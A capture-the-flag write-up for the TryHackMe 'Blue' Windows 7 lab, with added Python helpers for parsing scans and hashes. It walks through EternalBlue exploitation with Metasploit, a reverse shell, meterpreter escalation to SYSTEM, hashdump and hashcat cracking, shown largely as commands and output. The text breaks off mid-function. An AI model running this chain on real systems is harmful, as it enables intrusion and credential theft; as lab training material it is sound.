TryHackMe - Blue
April 12, 2020
Prerequisite
$ export IP=THM_VPN_IP
TASK 1 - RECON
1. Scan the machine
The command below kicks off the nmap scan, writing the output in all formats (-oA) into the portScan directory.
$ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP
Nmap scan report for 10.10.0.135
Host is up, received echo-reply ttl 127 (0.050s latency).
Scanned at 2020-04-12 12:48:35 BST for 137s
Not shown: 991 closed ports
Reason: 991 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 127
|_ssl-date: 2020-04-12T11:49:53+00:00; +1s from scanner time.
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:09:52:93:bf:3a (unknown)
| Names:
| JON-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| JON-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 02 09 52 93 bf 3a 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62444/tcp): CLEAN (Couldn't connect)
| Check 2 (port 34185/tcp): CLEAN (Couldn't connect)
| Check 3 (port 22744/udp): CLEAN (Timeout)
| Check 4 (port 44981/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-04-12T06:49:38-05:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-12T11:49:38
|_ start_date: 2020-04-12T09:42:45
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 12:50:52 2020 -- 1 IP address (1 host up) scanned in 137.96 seconds
2. How many ports are open with a port number under 1000?
135/tcp
139/tcp
445/tcp
The correct answer for this question was 3.
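As an added example (not part of the original write-up or of nmap), the Python below parses an excerpt of the scan above: it answers the port-count question mechanically and, from a defender's view, pulls the SMB signing posture and OS out of the NSE script lines. The excerpt is copied from the scan output on this page.

```python
"""Parse nmap normal output: open-port count and SMB signing posture.

Added example for this write-up, not TryHackMe's or nmap's code. The
excerpt below is taken from the scan above; the parser handles the port
table and the '|'-prefixed NSE script lines that nmap prints.
"""
import re

SCAN_EXCERPT = """\
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 127
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# port/proto, state, service; the rest of the line (reason, version) is ignored
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_ports(text):
    """Return (port, proto, state, service) tuples from the port table."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return ports


def open_ports_below(text, limit=1000):
    """Open port numbers under `limit`: the TASK 1 question, answered by code."""
    return sorted(p for p, _proto, state, _svc in parse_ports(text)
                  if state == "open" and p < limit)


def script_lines(text):
    """NSE script output with the '| ' / '|_' prefixes stripped."""
    return [ln.strip().lstrip("|_").strip() for ln in text.splitlines()
            if ln.lstrip().startswith("|")]


def smb_findings(text):
    """Hardening findings a defender reads off smb-security-mode / smb2-security-mode."""
    findings = []
    for ln in script_lines(text):
        if ln.startswith("message_signing:") and "disabled" in ln:
            findings.append("SMB1 signing disabled: sessions can be relayed or tampered with")
        if ln.startswith("Message signing") and "not required" in ln:
            findings.append("SMB2 signing not required: clients may negotiate unsigned sessions")
        if ln.startswith("OS:") and "Windows 7" in ln:
            findings.append("Windows 7 host: out of support, confirm MS17-010 patch state")
    return findings


if __name__ == "__main__":
    print("open ports < 1000:", open_ports_below(SCAN_EXCERPT))
    for finding in smb_findings(SCAN_EXCERPT):
        print("-", finding)
```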
3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
As this machine is called Blue, it was safe to assume the answer would be EternalBlue, which is:
ms17-010
TASK 2 - GAIN ACCESS
1. Start Metasploit
$ sudo msfdb run
2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........).
Within Metasploit we search for eternalblue to list all the matching modules.
msf5 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
As can be seen above, there are four exploit modules (#2-5).
The correct answer for this question was #2.
exploit/windows/smb/ms17_010_eternalblue
3. Show options and set the one required value. What is the name of this value? (All caps for submission).
Following on from the above command we can determine the answer.
msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) >
The answer appears to be RHOSTS; however, when entered into the submission box it was marked incorrect. The answer they were looking for was RHOST. Maybe this was just a glitch in the matrix?
4. Run the exploit.
Before running the exploit we need to set the target (RHOSTS) and our listener port (LPORT).
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS THM_VPN_IP
RHOSTS => THM_VPN_IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
Carrying on our command workflow, we attempt to exploit the machine.
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on THM_VPN_IP:4444
[*] THM_VPN_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] THM_VPN_IP:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] THM_VPN_IP:445 - Scanned 1 of 1 hosts (100% complete)
[*] THM_VPN_IP:445 - Connecting to target for exploitation.
[+] THM_VPN_IP:445 - Connection established for exploitation.
[+] THM_VPN_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] THM_VPN_IP:445 - CORE raw buffer dump (42 bytes)
[*] THM_VPN_IP:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] THM_VPN_IP:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] THM_VPN_IP:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] THM_VPN_IP:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] THM_VPN_IP:445 - Trying exploit with 12 Groom Allocations.
[*] THM_VPN_IP:445 - Sending all but last fragment of exploit packet
[*] THM_VPN_IP:445 - Starting non-paged pool grooming
[+] THM_VPN_IP:445 - Sending SMBv2 buffers
[+] THM_VPN_IP:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] THM_VPN_IP:445 - Sending final SMBv2 buffers.
[*] THM_VPN_IP:445 - Sending last fragment of exploit packet!
[*] THM_VPN_IP:445 - Receiving response from exploit packet
[+] THM_VPN_IP:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] THM_VPN_IP:445 - Sending egg to corrupted connection.
[*] THM_VPN_IP:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (THM_VPN_IP:4444 -> 10.1.0.135:49175) at 2020-04-12 13:50:08 +0100
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>^Z
Background session 1? [y/N] y
5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
The shell initially came through blank; however, after pressing RETURN the DOS prompt of the exploited machine appears, as shown above.
TASK 3 - ESCALATION
1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected).
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf5 > grep meterpreter search shell
273 payload/android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline
274 payload/android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline
275 payload/android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline
439 payload/osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager
440 payload/osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager
459 payload/python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline
460 payload/python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline
461 payload/python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline
462 payload/python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline
482 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
483 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
484 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
485 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
486 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
487 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
488 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
489 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
492 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
493 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
524 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
525 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
526 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
527 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
528 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
529 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
566 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
msf5 >
The module required to upgrade a standard shell to a meterpreter session is post/multi/manage/shell_to_meterpreter.
2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer).
Carrying on our command workflow, we select the correct module and list the options.
msf5 > use 566
msf5 post(multi/manage/shell_to_meterpreter) > options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) >
The option we are required to set for this module is SESSION.
3. Set the required option, you may need to list all of the sessions to find your target here.
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... THM_VPN_IP:4444 -> 10.10.55.106:49175 (10.10.55.106)
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
4. Run! If this doesn't work, try completing the exploit from the previous task once more.
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on THM_VPN_IP:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (180291 bytes) to THM_VPN_IP
[*] Meterpreter session 2 opened (THM_VPN_IP:4433 -> 10.1.0.135:49171) at 2020-04-12 14:52:56 +0100
[*] Stopping exploit/multi/handler
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.27.96)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC THM_VPN_IP:4433 -> 10.1.0.135:49171 (10.10.27.96)
5. Once the meterpreter shell conversion completes, select that session for use.
msf5 post(multi/manage/shell_to_meterpreter) > sessions -h
Usage: sessions [options] or sessions [id]
Active session manipulation and interaction.
OPTIONS:
-C <opt> Run a Meterpreter Command on the session given with -i, or all
-K Terminate all sessions
-S <opt> Row search filter.
-c <opt> Run a command on the session given with -i, or all
-d List all inactive sessions
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-n <opt> Name or rename a session by ID
-q Quiet mode
-s <opt> Run a script or module on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List all active sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
msf5 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.81.119)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC THM_VPN_IP:4433 -> 10.1.0.135:49172 (10.10.81.119)
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1120 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
C:\Windows\system32>^Z
Background channel 1? [y/N] y
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
444 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
556 548 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
604 548 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
616 596 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
656 596 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
704 604 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
712 604 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
720 604 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
772 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
828 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
896 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
944 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1012 656 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
1076 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1120 2520 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\cmd.exe
1156 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1292 704 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1336 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1388 556 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
1412 704 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1476 704 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1596 704 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1612 704 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1724 772 WMIADAP.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WMIADAP.exe
1936 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2044 1292 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2056 772 taskeng.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\taskeng.exe
2060 828 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
2068 828 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2160 556 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2392 2384 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2520 2392 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2600 704 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2640 556 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2760 704 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2784 704 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2820 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2852 704 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2892 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2952 704 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
meterpreter >
8. Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
meterpreter > migrate 2892
[*] Migrating from 2520 to 2892...
[*] Migration completed successfully.
meterpreter >
TASK 4 - CRACKING
1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
2. Copy this password hash to a file and research how to crack it. What is the cracked password?
We first need to clean up the hash to match the format hashcat expects; examples of the expected formats are in hashcat's example-hashes reference. Basically, we keep only the NT hash (the fourth colon-separated field) and drop the surrounding fields, including every colon.
Original - HASH
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Hashcat - HASH
ffb43f0de35be4d9917ac0cc8ad57f8d
To confirm the hash is in the right form we can use hashid; note we are feeding in the modified hash, which is saved in a file (ntlm.txt).
> hashid -m < ntlm.txt
Analyzing 'ffb43f0de35be4d9917ac0cc8ad57f8d'
[+] MD2
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]
>
The hash format checks out, and hashid's -m switch also shows the hashcat mode we need: 1000 (NTLM).
Below is the hashcat command. The backticks run `cat ntlm.txt` so that its output (the hash) is substituted into the command line, and we use rockyou.txt as our wordlist.
--force - hashcat is being run in a VM
-a 0 - straight (wordlist) attack mode
-o - writes the cracked passwords to a file called cracked.txt
> hashcat -m 1000 -a 0 `cat ntlm.txt` /usr/share/wordlists/rockyou.txt --force -o cracked.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Core Processor (Skylake, IBRS), 2048/5918 MB allocatable, 4MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
* Device #1: Kernel m01000_a0-pure.ad7daebd.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Sun Apr 12 15:34:56 2020 (4 secs)
Time.Estimated...: Sun Apr 12 15:35:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2885.2 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel
Started: Sun Apr 12 15:34:46 2020
Stopped: Sun Apr 12 15:35:01 2020
> cat cracked.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:PASSWORDHERE
>
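The cleanup, identification and crack-confirmation steps above, as an added example that is not part of the original write-up nor code from Metasploit or hashcat. It parses the pwdump-format lines hashdump printed, extracts the NT field that hashcat -m 1000 expects, and, since an NT hash is MD4 over the UTF-16LE password (implemented here per RFC 1320), verifies a candidate password offline and flags blank-password accounts: the Administrator and Guest values above are exactly MD4 of the empty string. The sample lines are the three from the hashdump output on this page.

```python
"""Parse Metasploit hashdump (pwdump-format) lines and audit NT hashes.

Added example for this write-up, not code from TryHackMe, Metasploit or
hashcat. hashdump prints user:RID:LM:NT:::; hashcat -m 1000 wants only the
NT field. The NT hash is MD4 over the UTF-16LE password, implemented here
per RFC 1320 because OpenSSL 3 ships MD4 only in its legacy provider.
"""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # 'no LM hash stored' marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4(""): blank password

def _rotl(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data):
    """RFC 1320 MD4 of `data` (bytes), returned as 16 raw bytes."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    rounds = (  # (mixing function, additive constant, X[k] order, shift cycle)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
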